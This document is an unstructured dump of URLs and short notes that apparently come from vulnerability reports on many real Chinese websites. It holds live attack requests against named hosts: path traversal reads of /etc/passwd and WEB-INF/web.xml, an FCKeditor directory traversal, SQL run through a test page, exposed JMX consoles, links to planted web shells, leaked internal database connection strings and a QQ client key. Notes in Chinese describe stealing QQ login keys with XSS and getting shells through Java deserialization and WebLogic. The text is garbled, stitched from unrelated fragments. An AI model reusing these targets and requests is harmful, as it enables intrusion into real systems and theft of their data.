http://0easy.com/templet_pro.do?siteid=8677e0af-986b-43c5-9f06-017580d57d21&currChannelid=cbf04958-10b8-440f-9a37-5b2c62afff87&templetPath=..%2F..%2FWEB-INF%2Fweb.xml&jobid=235aa94c-8d4c-40c8-94e9-7e7fb8a20567 http://msi.sicnu.edu.cn/ http://msi.sicnu.edu.cn http://www.mycaijing.com/detail/223645.html http://www.duba.net/e/admin/admin.php www.duba.net/e/config/config.php https://github.com/tchqiq/MailReporting/blob/a38a24aa66c297d3cb90adf94cfac5908715a046/mail_test.py http://open.muzhiwan.com/?action=public&opt=login open.muzhiwan.com/?action=public&opt=check_username http://newswire.yicai.com http://cnar.wh.sdu.edu.cn/ http://cnar.wh.sdu.edu.cn/news.asp?newsid=137&daohang=%D7%EE%D0%C2%B6%AF%CC%AC http://simple.minanins.com:8021/console/login/LoginForm.jsp http://simple.minanins.com:8021/ca/ma3.jsp?o=vLogin http://cw.crcgas.com/ http://cw.crcgas.com/up.asp http://cim.chinamacro.com/RNBSS/user_login.do http://cim.chinamacro.com/RNBSS/conn.jsp http://cim.chinamacro.com/RNBSS/cmd.jsp jdbc:sqlserver://192.168.0.21:1433;DatabaseName=条码系统_热能 jdbc:oracle:thin:@192.168.0.39:1521:ebs jdbc:oracle:thin:@192.168.0.17:1521:pdm https://github.com/ywww/xunlei/blob/da20c9d24e458fb1d8937d652eb93025a4df4ac1/mail/src/main/resources/mail.properties http://learning.ufh.com.cn http://114.215.101.86:8080/login.do http://psych.tju.edu.cn/joins.php?user=-1 inurl:php http://**.**.**.**/index-info.php?id=340&category=17 http://mzw.anquanxia.com/?action=member&opt=showuser&uid=1605209 http://www.***.com/ http://www.infzm.com/mobile/get_list_by_cat_ids?cat_id%5B%5D=4769&start=0&count=11&platform=ireader&device=Unknown%20iOS%20device&version=4.0.0&system_version=7.0&hash=5f856a3b83efd83a8e0e7d1b382bcc50&format=json www.daidekuai.com/hdaidetail.php?id=241 http://mse.tju.edu.cn/ajt/download.php?id=3&type=attach http://liantong.cheyipai.com/PContrller/Login/forget_password_step1 http://school.10jqka.com.cn/question.php?op=new&vid=11111 http://www.0easy.com/contactus_save.do https://github.com/kinglion/tttuangou/blob/ba6b53612c949fa7437778b8ced80c5609f7e23f/dbfenxbackup.php http://**.**.**.**/templates/zt/gobyscv/citydetail.php?cityid=103018 http://**.**.**.**/index.php http://kq.qycn.com/ http://kq.qycn.com/personnel/leave/leaveDetails/dtype/1/lid/244114 https://github.com/tchqiq/MailReporting/blob/a38a24aa66c297d3cb90adf94cfac5908715a046/mail_test.py http://passport.oa.com/modules/passport/signin.ashx?url=http://****** http://10.130.0.78/ http://intime.com.cn:80/intime/front/stores/ http://intime.com.cn http://ahyt.intime.com.cn http://ws.intime.com.cn http://vip.intime.com.cn http://mail.intime.com.cn http://www.intime.com.cn/ http://**.**.**.**/activity/event_news_detail.php?event_id=4&topage=&qry_str= http://**.**.**.**/admin/login.php http://**.**.**.**/superadmin/ http://**.**.**.**/CTManager/login.do?lel=0&code=nahalacfpagoapogggjjcilcpobmpnib http://**.**.**.**/CTManager/upload/images/20151123_181202788.jsp http://s.biketo.com/ajax/fansList?num=54?timestamp=1447904911977&shop_id=1769&start=0 http://**.**.**.**:8085/counter/readcount.asp?userid=dangsn http://**.**.**.**/ejournals/journal/10.1055/s-00 http://**.**.**.**/activity/event_news_detail.php?event_id=13&topage=&qry_str= http://www.zhongxin200.cn/page.asp?id=104&typeid=26 http://www.zhongxin200.cn/showclass.asp?id=15 http://www.zhongxin200.cn/shownews.asp?newsid=5342&typeid=26 http://www.zhongxin200.cn/showqk.asp?id=13 http://www.zhongxin200.cn/showteam.asp?id=50&type=15&aid=62 http://**.**.**.**/esncku/zh/page.activity.action http://jyyy.jx.sgcc.com.cn http://cw.crcgas.com/ http://cw.crcgas.com/upload.asp http://new.conqueror.cn/now_download_products.php?id=279 http://**.**.**.**/activity_news_detail.php?id=48&topage= http://**.**.**.**/site_item_content_1.php?site_map_item_id=7 http://**.**.**.**/tcc/site_item_content_1.php?site_map_item_id=3 http://**.**.**.**/huide_hosp/big5/site_item_content_1.php?site_map_item_id=8 http://**.**.**.**/site_item_content_1.php?site_map_item_id=19 http://**.**.**.**/site_item_content_1.php?site_map_item_id=9 http://**.**.**.**/site_item_content_1.php?site_map_item_id=3 http://**.**.**.**/site_item_content_1.php?site_map_item_id=4 http://**.**.**.**/site_item_content_1.php?site_map_item_id=23 http://**.**.**.**/site_item_content_1.php?site_map_item_id=14 http://**.**.**.**/news/newslist.php?selectCat=3 http://**.**.**.**/news/newslist.php?selectCat=3 jk:12344312 http://www.jisupdftoword.com/user_validate?email=10000@jisupdfto.com&sign=MTAwMDBAamlzdXBkZnRvLmNvbQ== http://www.jisupdftoword.com/user_gotoresetpwd?email=10007@jisupdfto.com http://www.jisupdftoword.com/user_validate?email=10007@jisupdfto.com&sign=MTAwMDdAamlzdXBkZnRvLmNvbQ== http://**.**.**.**:8080/SSO/ResourceStation/pages/resourceUserResult.jsp?item=language&nLanguageId=4 http://**.**.**.**/SSO/ResourceStation/pages/resourceUserResult.jsp?item=language&nLanguageId=4 http://**.**.**.**/SSO/ResourceStation/pages/resourceUserResult.jsp?item=language&nLanguageId=4 http://**.**.**.**/3_1.php?news=501 http://**.**.**.**/_admin/login.php http://**.**.**.**/files/shell.php http://e.cheyipai.com/ http://f.cheyipai.com/Function/CarReport/ReportProBefUetcom.aspx?tradeCode=BJE151107551661&date=151107&tflag=1&shflag=0&csflag=0 http://media4.open.com.cn/L603/dongshi/xiaoxuesxxxxlx/manage/news_view.asp?newsid=246 http://**.**.**.**:9224//userCenter/checkVerifyCode.do?jsoncallback=jQuery17104104780244703179_1448281825349&phoneNumber=13333333333&type=findPass&verifyCode=1234&_=1448281880531 http://**.**.**.**/user/findPassword.do http://**.**.**.**/ http://my.3454.com/flash.php?ac=pk_iframe&do=next&fgid=1&wheeleid=1 http://140.206.49.178/messager/users.data http://**.**.**.**:8082/GenMedia/frmSearchResult.aspx?searchkey=e http://jmsc.tju.edu.cn http://www.wasu.com.cn/ http://www.wasu.com.cn/admin http://www.qoros.com/admincp/site/operator/search/list/search.php http://**.**.**.**/wcyc/news_detail.aspx?Activity_id=1 URL:http://**.**.**.**/wcyc/admin/Index.aspx http://**.**.**.**/wcyc/file/activity/957/54_aa.aspx http://**.**.**.**/aca2012/gra/unit_news.asp?id=3&ord=bdate%20desc,btime&desc=desc&kind2=dname|%E7%A0%94%E6%95%99%E7%B5%84 http://**.**.**.** http://**.**.**.**/download http://**.**.**.** http://auto.hualongxiang.com/list?b=48 http://itravel.huawei.com/ http://112.74.64.234:5555/index.action http://e.zznissan.com.cn/ajax_carprice.php?modelsId=254 http://e.zznissan.com.cn/ajax_car_price.php?seriesId=&cityId=830 http://e.zznissan.com.cn/ajax_jxs_list.php?jxs=&province=806&city=830&address= http://e.zznissan.com.cn/ajax_jxs_point.php?jxs=&province=806&city=830&address= http://e.zznissan.com.cn/ajax_jxs_view.php?jxs=&province=806&city=830&address= http://www.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.47074823500588536&pt_local_tk=12345678 http://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=11111111&callback=ptui_getst_CB&r=0.05807492393068969&pt_local_tk=12345678 https://ssl.ptlogin2.qq.com/jump?clientuin=277634777&keyindex=9&pt_aid=522005705&daid=4&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=1232278179&pt_3rd_aid=0&ptopt=1&style=25 https://ssl.ptlogin2.qq.com/jump这个请求设置的cookie是httponly的,clientuin和clientkey在使用完后也删除了 http://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=11111111&callback=ptui_getst_CB&r=0.05807492393068969&pt_local_tk=12345678 http://ui.ptlogin2.qq.com/assistant/troubleshooter.html http://bbs.browser.qq.com/newthread?action=edit&fid=48&pid=242412&tid=93562&pos=9&special=0 http://ptlogin2.qq.com/jump?pt_clientver=5455&pt_src=1&keyindex=9&ptlang=2052&clientuin=3285197011&clientkey=00015653D111006897ED1217CB4F78787F701442DB6DC550D2A0A6B388E1D4528D3F41B14B359E345C244BBC75F24D6693707003C55A4BE0926A121E44B57AADEFCDE3DE182F2837B57578EC6F58E76D2D93E6EE435BDD6FB2C8AA7569AC13F71F2000FED048162503468772B1522983&u1=http%3A%2F%2Fbbs.browser.qq.com%2F http://ui.ptlogin2.qq.com/assistant/troubleshooter.html,执行我们的cookie存储xss,然后ptlogin的xss往cookie中写一个假的pt_local_token,然后伪造快速登陆的流程,此时,clientuin和clientkey已在cookie中种下,然后我们的xss再去偷即可 http://**.**.**.**/web/Help.aspx?code=Private http://war3.163.com:8443/login?from=%2F.利用java反序列化执行的漏洞获取一枚shell http://2.job1001.com http://**.**.**.**/admin/ http://xxx/admin_login.php登陆 http://xxx/admin/index.php即可进入后台 http://www.software.fudan.edu.cn/css/a/201511082001.html http://www.software.fudan.edu.cn/css/a/201511082002.html http://www.software.fudan.edu.cn/css/a/201511082817.html http://www.software.fudan.edu.cn/css/a/2015110818843.html http://www.software.fudan.edu.cn/help.jsp http://tdjxxy.tju.edu.cn http://flow.apps.huhoo.com/?huhoo_caseid=1 http://bjshzhy.opark.com/index.php/markets/index?huhoo_caseid=1&keyword=1 http://3chuang.nau.edu.cn/ http://eas.creditease.cn居然存在weblogic这个服务.然后利用反弹的脚本直接就得到了cmdshell http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=8 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=9 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=10 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=11 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=12 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=8000 https://github.com/hwf452/efb/blob/master/efb/resources/jdbc.properties jdbc:mysql://192.168.8.3:3306/EFB jdbc:mysql://121.40.183.68:3306/efb-1-3 jdbc:mysql://rdsr3u3ammzjyau.mysql.rds.aliyuncs.com/efb-1-3 jdbc:mysql://rdsy6vzb2y6vzb2.mysql.rds.aliyuncs.com/efb-1-1-4 http://www.jyb360.com/ http://web.jyb360.com/web/images/qrcode.png http://v.juhe.cn/sms/send http://210.21.212.7:8080/febop/requestApply.go https://trade.lionfund.com.cn/febop/requestApply.go http://oss.aliyuncs.com http://${bucketName}.oss-cn-hangzhou.aliyuncs.com http://sdk.open.api.igexin.com/apiex.htm http://www.qiangdaiwang.cn/robots.txt http://www.qiangdaiwang.cn/admin2015888/ Cookie:menuitems=1_1%2C2_1%2C3_1 https://github.com/huangjunkun/stat_vod_shell/blob/67b3431f0ca50b63b4856acf328de3c24beaba24/sendEmail.sh http://food.hualongxiang.com/home/shop/list?page=1&street=10 http://180.168.26.117:8080/ http://180.168.26.117:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://180.168.26.117:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/search/showdetail.aspx?rsid=37ebe474-acd4-4ff2-ba212b59eaf671a8&docid=9868&title=RFID%E5%B0%84%E9%A2%91%E8%AF%86%E5%88%AB%E6%8A%80%E6%9C%AF%E5%9C%A8%E6%99%BA%E8%83%BD%E4%BA%A4%E9%80%9A%E9%A2%86%E5%9F%9F%E7%9A%84%E5%BA%94%E7%94%A http://**.**.**.**/search/showdetail.aspx?rsid=37ebe474-acd4-4ff2-ba212b59eaf671a8&docid=9868&title=RFID%E5%B0%84%E9%A2%91%E8%AF%86%E5%88%AB%E6%8A%80%E6%9C%AF%E5%9C%A8%E6%99%BA%E8%83%BD%E4%BA%A4%E9%80%9A%E9%A2%86%E5%9F%9F%E7%9A%84%E5%BA%94%E7%94%A8 http://dms.essilorchina.com:7001/edmsii/ http://dms.essilorchina.com:7001/jmx-console http://dms.essilorchina.com:7001/wooyun/ixm.jsp http://dms.essilorchina.com:7001/invoker/JMXInvokerServlet http://dms.essilorchina.com:7001/is/index.jsp http://dms.essilorchina.com:7001/edmsii/purchase/elecdeliverycodemodify.do http://**.**.**.**/news_detail.php?cate=game&type=3&id=5694 http://**.**.**.**/news_detail.php?cate=game&type=3&id=5694 www.wanglibao.com https://183.239.152.54/por/login_psw.csp?sfrnd=2346912324982305&encrypt=0 http://eip.zznissan.com.cn:2051 http://u.muzhiwan.com/index.php?action=profile&opt=userHead http://**.**.**.**/ https://**.**.**.**/myadmin/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/sc8/logon/userlogon-interface.do集美大学网络教学平台 http://www.agehui.com/ xxoo.com//choose_seeds.php?city=0&district=0&land=1&pre_crop=0&province=0&season=2&soil=1 www.agehui.com URL:http://y.qq.com/m/client/msg/index.html?uid=1&cv=5050028&ct=11 http://**.**.**.**/view/home.action http://**.**.**.**/bugs/wooyun-2015-0144850 http://**.**.**.**/cn/products/access/dslam/201405/t20140515_423907.html http://**.**.**.**/job.php?id=1015 http://222.91.97.76/esoaisapp/login.jsp http://csic.wh.sdu.edu.cn http://csic.wh.sdu.edu.cn:80/ http://**.**.**.**/faq/?parent_id=1270 http://**.**.**.**/index.action http://**.**.**.**:9090/wcm/存在弱口令,且后台的用户名命名规范不够强,导致很容易猜测得到用户名,同时利用存在的弱口令漏洞,很轻易的就可以进入系统后台。 http://gaoshou.wanxue.cn/gaoshou/gsapp/gssend_message.do?phone=手机号&v=2 http://s.wanxue.cn/app/send_message.do?phone=手机号 http://gaoshou.wanxue.cn/gaoshou/gsappMine/gsUserDetails.do?v=1¤tUserId=1234&userId=待查ID http://gaoshou.wanxue.cn/gaoshou/gsappCoze/gsCounselorAndgroupsByOptions.do?sortField=USERNAME&sortType=ASC&pageNo=0&v=1&type=1&pageSize=2000 http://**.**.**.**/activity_news_detail.php?id=48&topage= http://**.**.**.**/site_item_content_1.php?site_map_item_id=7 http://**.**.**.**/tcc/site_item_content_1.php?site_map_item_id=3 http://**.**.**.**/huide_hosp/big5/site_item_content_1.php?site_map_item_id=8 http://**.**.**.**/site_item_content_1.php?site_map_item_id=19 http://**.**.**.**/site_item_content_1.php?site_map_item_id=9 http://**.**.**.**/site_item_content_1.php?site_map_item_id=3 http://**.**.**.**/site_item_content_1.php?site_map_item_id=4 http://**.**.**.**/site_item_content_1.php?site_map_item_id=23 http://**.**.**.**/site_item_content_1.php?site_map_item_id=14 http://**.**.**.**/shop_qa_detail.php?id=33 http://**.**.**.**/prod_item_list.php?class_id=39 http://**.**.**.**/cn/prod_item_list.php?class_id=6 http://**.**.**.**/prod_item_list.php?class_id=1 http://**.**.**.**/big5/prod_item_list.php?class_id=4 http://**.**.**.**/prod_item_list.php?class_id=98 http://**.**.**.**/prod_item_list.php?class_id=5 http://**.**.**.**/china/prod_item_list.php?class_id=3 http://**.**.**.**/queryFile2.do?zihan=2 http://**.**.**.**/p_personservice.jspx?base=&resSys=%2Fr%2Fcms&res=r%2Fcms%2Fwww%2Fred&location=http%3A%2F%2F**.**.**.**%2Fperson%2Flogout.do&locale=zh_CN http://passport.m.111.com.cn/sso/login.action http://www.flyertrip.com/member/changepassword.php?p=xxxxx@qq.ccom http://**.**.**.**/news1.php?id=19 http://**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/sysconfig/network-scripts/ifcfg-eth1 FD:89:D0:85 http://**.**.**.**/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://www.oppo.com/mx/components/com_activehelper_livehelp/server/frames.php?AGENTID=1&DOMAINID=1&LANGUAGE=sp&SERVER=&URL=http://www.oppo.com/mx/smartphone-r1l/ https://**.**.**.**/zongyl/WEB/blob/86d84f1ee4fdefa696cfa0b173456a96fe1c5f0c/src/main/java/com/yhjj/Test.java http://tee.sports.sohu.com./signin.php http://**.**.**.**/nbr.htm http://**.**.**.**/nbr.htm http://**.**.**.**/nbr.htm http://www.fesco.com.cn/vip/salon/baoming.asp http://**.**.**.**/index.php?c=Index&a=detail&catid=47&newid=249 http://**.**.**.**/Default.aspx http://eshop.yihao01.com/basedata/api/searchUnit?sign=4447C9E05AF05029A4B1C1DD87A40E85&cityCode=310100&v=2.4.0&ttid=1&keyword=江南 http://**.**.**.**/lib/class/index.php http://**.**.**.**/.svn/entries http://localhost:8088/sysinterface/codeEdit.jsp?filename=******5308.java&filetype=java http://hbjzmh.zznissan.com.cn/map.php?jxs=541 http://sqlmap.org http://www.k.cn/.svn/entries http://**.**.**.**/ http://**.**.**.**/dxjhProject/Download?strName=test.txt&strPath=../../../../../../../../../../etc/passwd&strType=affix https://**.**.**.** http://u1.guomob.com/ http://cn.gpspax.com https://github.com/licaihuan/obs/blob/a28dd5abf0c04c5b23e9382590b2b7b730f1b0b3/src/application/models/bizservice/utls_svc.php http://www.chinapnr.com http://www.chinapnr.com/questionnaire/questionnaire.php www.chinapnr.com http://www.chinapnr.com http://**.**.**.**:8080/SSO/ResourceStation/pages/resourceUserMore.jsp?nId=760 http://**.**.**.**/SSO/ResourceStation/pages/resourceUserMore.jsp?nId=760 http://sso/ResourceStation/pages/resourceUserMore.jsp?nId=760 http://**.**.**.**/assistant.php?cid=5&rl[]=90&ty=1 http://**.**.**.**/assistant.php?cid=5&rl[]=90&ty=1 http://demand.ad.xiaomi.com http://runreport.dnion.com/index.zul http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534 http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534 http://yun.zjer.cn/ http://**.**.**.**/oa/login.jsp http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.bntnews.cn/app/news.php?nid=31229 http://www.bntnews.cn/app/news.php?nid=31229 http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag http://**.**.**.**/search.php?keyword=%E6%99%BA%E8%83%BD%E6%89%8B%E6%A9%9F&op=tag http://**.**.**.**/news_list.php?ny=2015&nm=11 http://**.**.**.**/news_list.php?ny=2015&nm=11 http://**.**.**.**:8700/ http://**.**.**.**:8700/changePass http://**.**.**.**:8700/ChangePassword1.jsp http://subject.ourgame.com/,这个二级域名会跳转到主站! https://**.**.**.**/perbank5/pb3160_sendMobilDynPwd.do https://**.**.**.** https://**.**.**.** http://**.**.**.**/pos/ http://**.**.**.**:8088/ http://**.**.**.**:8088/ http://**.**.**.**:8888/ https://**.**.**.**/xiekc503/volunteer/blob/a20b8e92aa90a8d8dfaa9950c8be6d2235b92fb2/AutoSubmit/LoginDlg.cpp http://**.**.**.**/ http://**.**.**.**:8181/spam/system/index.action http://**.**.**.**/cn/download_more_714.html wsse:Username http://**.**.**.**/rx/login.aspx http://**.**.**.** http://**.**.**.**/index.php/Index/Ndetails/class/news/htmls/moving/id/1406.html http://**.**.**.**/program_page.php http://cmobile.colourlife.com/.svn/entries http://**.**.**.**:7001/Login.jsf http://**.**.**.**:7001/Login.jsf http://**.**.**.**:7001/Login.jsf http://bj.lianjia.com/cmsmanage/ http://topic.cnmo.com/topic_vote.php?voteid=56 http://qr.ciwong.com/qr/app/?a=fIbYVziYVN7v http://e.ciwong.com/admin/ http://www.gpspax.com http://**.**.**.**/ebooknw/printpage.asp?ArticleID=4107 http://www.vcash.cn http://www.vcash.cn/obiz/app/account/pwdfindreset www.vcash.cn http://cms.renrenche.com/src/#/articleList URL:http://kft.house.sina.com.cn/default/default/list?city=qd&housename=1&htype=1&loc=1&page=2&price=1 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**//site/review/review_user.asp?id=164459 http://**.**.**.**//site/review/review_user.asp?id=164459 http://**.**.**.**//site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**:3080/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://**.**.**.**/site/review/review_user.asp?id=164459 http://www.csstoday.so//site/review/review_user.asp?id=164459 http://**.**.**.**/ http://**.**.**.**/public/getclientset_evalstr.jsp http://**.**.**.** http://sus.museum.yiban.cn/webzine/webzine05.php http://sus.museum.yiban.cn/tess/upload/ http://welomo.com/index.php/Index/newscon?n_id=36 http://mba.tju.edu.cn/reg_servlet?action=portal.check_noapp&email=sample%2540email.tst&id=1 http://**.**.**.**//login.aspx http://**.**.**.**//login.aspx http://www.flyertrip.com/member/changepassword.php?p=xxxxxxx@xx.com https://**.**.**.**/MA/login/index.do http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 http://sqlmap.org https://github.com/yyhhk6/PingAnBankWeiXin https://github.com/yyhhk6/PingAnBankWeiXin/blob/9c2123df635c6c1388f0fa8ff88ccffe59e6c0e7/src/main/resources/properties/db.properties living.lib.tsinghua.edu.cn/index.php/Read/view/id/66.html living.lib.tsinghua.edu.cn/index.php/Read/view/id/66 living.lib.tsinghua.edu.cn/index.php/Read/view/id/66 http://www.zznissan.com.cn/dongfengfengdu/buy/Mp4Down.php?id=8 http://sqlmap.org http://**.**.**.** URL:http://zs.job168.com/train/searchresult.jsp data:im=70&keyword=42 http://**.**.**/login_czw.jsp_ http://baobao.baidu.com/papi/misuser/auditlist?type=4&auditSt=1&startTime=&endTime= http://baobao.baidu.com/papi/misuser/auditlist?type=0&auditSt=1 http://baobao.baidu.com/papi/misuser/groupmember?cid=300001&date=201511 http://baobao.baidu.com/papi/misuser/uniapplylist?status=2 https://**.**.**.**/award/ http://**.**.**.**/shipol/job.jsp http://**.**.**.**/shipol/document/20130307202946436323.jsp http://**.**.**.**/news_noTitle.php?id=162 http://tv.cntv.cn/live/cctv13 http://www.shuibeijie.com/front/index https://github.com/Vurteon/mks-server/blob/1c7134abbd5dc4409ad2262443f755ae987e33d3/web/WEB-INF/c3p0_con_pool.xml http://**.**.**/login_lg.jsp_ http://**.**.**.** http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../../ http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/C http://member.ehaier.com/login.html?returnUrl=http%3A%2F%2Fmember.ehaier.com%2Findex.html此处接口一开始无验证码,一定次数之后就出来了验证码 www.496691417@qq.com http://**.**.**.**/Backstage/Content/SpecialJob_SearchForSocietyResult.aspx?passportCardNo= http://oms.lncmcc.info:8087/lnmams/portal/login.action http://**.**.**.**/editor http://**.**.**.**/ntpuhistory/Alumni/ http://oi.tju.edu.cn/status?user=windyvov http://**.**.**.**/ http://**.**.**.**:8888/mingyu/sys/login.init.do http://www.kmimall.com/waps/shop_order?id=11275 http://www.flyertrip.com/hotels/personalCenter/editTravel.php?flag=update&id=237 http://games.mobileapi.hupu.com/3/7.0.4/chat/getChat?client=111&night=0&direc=next&gid=151050&type=nba&pid=29514&roomid=7 http://house.qingdaonews.com/news/pictjwap.asp?id=8106 http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key= http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key= site:admin.fenqi.im site:wxbd.fenqi.im http://**.**.**.**/page/article.php?id=135 http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 http://tutv.tju.edu.cn/Category?id=6&k=1 https://**.**.**.**/search?p=10&q=%**.**.**.**+username+password&ref=searchresults&type=Code&utf8=%E2%9C%93 http://**.**.**.**/bugs/wooyun-2015-0133219 http://**.**.**.**/ioop-bcs-web/main.do http://**.**.**.**/repair_log.asp?rid=A201503041555116491 http://**.**.**.**/wwwroot.rar android:targetSdkVersion="14 http://oldhr.jjshome.com/v/usercenter/register?type=1&id=1 http://14.17.123.10/ http://14.17.123.10/develop/ http://14.17.123.10/rockmongo/index.php?action=login.index&host=0 http://heilongjiang.zznissan.com.cn/showcartype_img.php?mid=5 www.chinalife.com.cn网站SOAP接口,无限刷注册用户信息,通过身份证号、邮箱等可以暴力查询注册用户信息,使用户信息泄漏。其用户信息涵盖了用户手机号、邮箱等等。 http://www.chinalife.com.cn/online/services/appRegisterQueryService?wsdl http://www.chinalife.com.cn/online/services/appRegisterUserService?wsdl http://touzhu.cn/ http://touzhu.cn http://fagui.eol.cn http://www.wasu.com.cn/news?newsid=32173 http://extplat.minanins.com:8011 http://extplat.minanins.com:8011/console/login/LoginForm.jsp http://extplat.minanins.com:8011/ca/ma3.jsp jdbc:oracle:thin:@172.40.1.20:1521/matedb http://**.**.**.** http://**.**.**.**/foods/index.php?cityid=5 http://**.**.**.**/foods/index.php?cityid=5 http://**.**.**.**/News/News_info.aspx?ID= http://**.**.**.**/InvestorRelations/ProtectDetail.aspx?ID= http://jituan.b2b.cn/category/Category/index?cid=312 http://**.**.**.**/teach_data/duty.php?id=2553 http://**.**.**.**/newsshow.asp?newsid=86 http://**.**.**.**/ggshow.asp?ggid=106 http://**.**.**.**/cqnjshow.asp?njid=17 http://**.**.**.**/jyxx_cqcrshow.asp?cqb_id=126 http://**.**.**.**/zcfgshow.asp?zcfgid=149 http://**.**.**.**/jyxx_swcrshow.asp?swb_id=118 http://**.**.**.**/zpxxshow.asp?zp_id=396 http://**.**.**.**/jgznshow.asp?id=13 http://www.qbm360.com/ http://xxx.kongzhong.com/index3.php http://xxx.kongzhong.com/server.php?action=full&Uid=605 http://sd.kongzhong.com//applicationlist.php?action=full&Uid=10 http://webzhj.kisdee.com/index.html http://cw.crcgas.com/index.asp http://cw.crcgas.com/cwdown.asp?id=59650 http://cw.crcgas.com/cwdown.asp?id=59651 http://cw.crcgas.com/cw1_del.asp?id=59651 http://cw.crcgas.com/cw1_del.asp?id=59650 http://**.**.**.**:8088 http://121.193.130.116/admin-console http://121.193.130.116/jmx-console/ http://cpcs.ule.cn/ulecase/toModifyUleCase.do?bugId=238621 http://vps.ule.com/vpsAdmin/admin/main.do android:targetSdkVersion="16 http://www.dogame.com.cn/space.php?user=xuechengjiaoyu http://**.**.**.**/ https://github.com/vinlinch/edwEtl/blob/d49ee7d44b0445f2a976102e79675b8aa5204e7a/src/DataWarehouse/DataWarehouse.SimulatingTool/App.config http://www.yunpian.com/api/user.html#a1 http://**.**.**.**/job/jobs_2_list1.php?id=-1 http://tubic.tju.edu.cn/cgi-bin/blast/blast_genome.py?jobID=1111 http://u.itjuzi.com/tag?id=787&location=in http://cen-bds.dopool.com/?page_id=136 inurl:webapp/preview.jsp?ColumnID= http://**.**.**.**/iec/cas2_client_jsp/login.jsp?c=U03511,该地址为宝钢旗下的系统,其中C参数存在SQL注射漏洞 http://hr.allinpay.com:8082.利用java反序列化执行的漏洞获取一枚shell http://wx.allinpay.com/.意外的发现使用的是pigcms。拿出某过期的0day打了一发.直接就搞到了shell http://krt.huhoo.com http://os.wasu.cn/weixiu/login.php http://b.daojia.com.cn/service.php?action=2147483649&uid=1448444660855&user=e http://apitest.qufenqi.com/ http://zone.wooyun.org/content/1060 http://**.**.**.**/ http://www.yingshangkeji.com http://**.**.**.**/ http://login.beibei.com/member/find_passwd.html http://**.**.**.**/ http://**.**.**.**:80/ http://**.**.**.**/services/uddi/inquiryapi!IBM|http://**.**.**.**/services/uddi/v2beta/inquiryapi!IBM http://**.**.**.**/inquire!Microsoft|http://**.**.**.**/glue/inquire/uddi!XMethods| https://**.**.**.**/check_verify.php?uid=5654fc11a42df http://upesn.com http://**.**.**.**/news/list?title=a&type_id=1 http://epp.dell-brand.com//user.php?act=signin http://**.**.**.** F9342B61ADBA3CBA1CD931E36589D702:FG=1 http://**.**.**.** http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/bugs/wooyun-2015-0105038 http://bj.luckyair.net/8l/flight/multiway.action http://bj.luckyair.net/8l/flight/multiway.action http://bm.huatu.com/plus/sd_sk.php?fx=%B3%A4%B4%BA%B7%D6%D0%A3&kslx=%CA%A1%BF%BC&province=-1&sfzs=&typeid=852 http://pyh.luckyair.net:80/ http://**.**.**.**/index.php/Home/Help/show?id=134 http://**.**.**.**/index.php/Admin/Login/index.html http://jxjy.shsmu.edu.cn/ShowBroad.aspx?Broad=201511241056 http://jxjy.shsmu.edu.cn/ http://jxjy.shsmu.edu.cn/photo/13/ http://**.**.**.**/06/health_area_detail.php?id=15 http://**.**.**.**/health_area_detail.php?id=6 http://**.**.**.**/health_area_detail.php?id=45 http://**.**.**.**/jiannren/health_area_detail.php?id=135 http://**.**.**.**/health_area_detail.php?id=9 http://**.**.**.**/cn/health_area_detail.php?id=5 http://**.**.**.**/old/health_area_detail.php?id=33 http://**.**.**.**/health_area_detail.php?id=131 http://**.**.**.**/health_area_detail.php?id=132 http://**.**.**.**/health_area_detail.php?id=3 http://**.**.**.**/health_area_detail.php?id=1 http://**.**.**.**/activity_news_list.php?class_id=1 http://**.**.**.**/activity_news_list.php?class_id=1 http://**.**.**.**/activity_news_list.php?class_id=1 